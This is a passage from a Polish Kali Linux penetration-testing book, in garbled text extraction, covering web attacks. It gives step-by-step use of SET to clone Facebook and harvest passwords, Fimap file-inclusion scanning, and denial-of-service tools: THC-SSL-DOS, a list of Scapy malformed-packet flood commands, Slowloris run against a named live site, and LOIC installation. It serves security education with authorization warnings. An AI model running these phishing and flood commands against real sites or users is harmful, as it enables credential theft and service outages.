Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

